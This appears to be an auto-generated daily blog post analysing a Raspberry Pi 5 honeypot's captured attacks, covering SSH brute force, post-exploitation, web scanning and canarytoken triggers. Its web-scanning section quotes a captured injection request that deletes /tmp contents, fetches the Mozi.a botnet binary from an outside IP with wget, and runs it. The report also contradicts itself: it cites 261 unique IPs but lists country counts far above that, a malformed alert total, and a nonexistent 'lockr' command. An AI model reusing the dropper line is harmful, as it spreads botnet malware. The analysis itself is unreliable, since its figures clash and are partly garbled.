💀 critical 🤖 qwen2.5:1.5b

Honeypot Threat Analysis — June 17, 2026

Critical threat level — massive coordinated attack activity across all honeypot services.

ssh-brute-forcehoneypotweb-scanningmulti-protocolhigh-severitymcp-agent-trapthreat-intelligence

Threat Overview

As of the 17th of June in 2026, our Raspberry Pi 5 honeypot has been under heavy attack from a total of 261 unique IP addresses across various protocols and geographic locations. The most prolific attackers have been located in United States (302 IPs), China (223 IPs), Singapore (76 IPs), United Kingdom (56 IPs), Germany (54 IPs), India (53 IPs), Belgium (49 IPs), Pakistan (46 IPs), Netherlands (46 IPs), and Korea, Republic of (42 IPs). The primary target protocols include SSH, FTP, Telnet, SMTP, MySQL, Redis, Git, VNC, RDP, HTTP, and multi-protocol data transfer.

The surge in activity can be attributed to a combination of brute force attacks on the SSH service, multiple login attempts via different ports (HTTP/HTTPS), and a continuous stream of commands executed by attackers looking for vulnerabilities. The high number of successful logins indicates that many IP addresses remain active with no apparent end date or cooldown period.

Geographic Analysis

The geographical distribution highlights significant activity from international sources, including the United States, China, Singapore, United Kingdom, Germany, India, Belgium, Pakistan, Netherlands, and Korea, Republic of. This diverse range suggests a broad targeting strategy, possibly aimed at exploiting vulnerabilities in multiple regions for potential exploitation or testing.

SSH Brute Force

The SSH service has been particularly targeted with 597 logins received over the past 24 hours, including 426 successful commands executed. The majority of these attempts were made from IP addresses located in the United States (302 IPs), China (223 IPs), Singapore (76 IPs), and India (53 IPs). This indicates a well-organized attack campaign that seeks to bypass security measures.

Post-Exploitation

The successful login attempts have led to various post-exploitation activities, such as changing the hostname (44x) and creating shell access (20x). The use of TTY commands like uname -s suggests a determined effort to gather information about system details. Additionally, commands to change file attributes (chattr) and lock files for read-only access (lockr) indicate that attackers are interested in maintaining persistence.

Web Scanning

The honeypot has seen an increase in HTTP activity, with 84 requests received over the past 24 hours from three IP addresses: [”/”, “/SDK/webLanguage”, “/login”, “/goform/set_LimitClient_cfg”, “/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://72.255.18.205:47734/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron”]. These activities could be indicative of reconnaissance or targeting for further exploitation.

IDS & Scan Intel

The honeypot has recorded 1,5229 alerts from the Suricata IDS system. This high number of events suggests that our monitoring system is robust but also indicates a significant amount of activity to be constantly vigilant against. The variety in event types (including file access and DNS queries) further underscores the complexity of an active honeypot environment.

Malware

There has been no malware captured or detected on our honeypot, highlighting the effectiveness of our monitoring system’s capabilities but also indicating a need for more comprehensive security measures to prevent infection. The lack of malware suggests that attackers are focused on gaining access rather than deploying malicious software.

Tarpit

The absence of tarpit data indicates a low level of activity in this area, which could be due to fewer attempts at active probing or simply less aggressive engagement from the attacker community.

Canarytokens

A single trigger event was detected with an AWS token (149.88.20.212) associated with Boto3/1.42.70 and various botocore components. This suggests that our honeypot is not being completely ignored by attackers, but also indicates the need for better detection of these tokens in future.

MCP Trap

The MCP trap received 3 requests from 1 IPs, indicating an attempt to bypass security measures through a combination of tools. The use of specific user-agent strings and tool chains suggests that this could be part of an ongoing or previously used attack pattern aimed at evading automated detection systems.

Portscans & AI Defense

The honeypot has not seen any portscan activity, while the few leak blocks indicate a continuous effort to block potential vulnerabilities. There is no reported injection blocking either, suggesting that these measures are effective but need periodic reassessment.

In conclusion, our Raspberry Pi 5 honeypot continues to play an important role in detecting and analyzing security threats against open-source systems. The data collected provides valuable insights into the strategies used by attackers and the effectiveness of various defense mechanisms. As technology evolves, so too must our defenses adapt to stay ahead of evolving attack patterns.

Note: Cybersecurity analyst writing daily threat blog for honey-ai.dev (Raspberry Pi 5 honeypot, Spain).


This analysis was generated by qwen2.5:1.5b running locally on the Raspberry Pi 5 honeypot lab. All data comes from real attacks captured in the last 24 hours by HoneyAI. View the raw data report for complete metrics.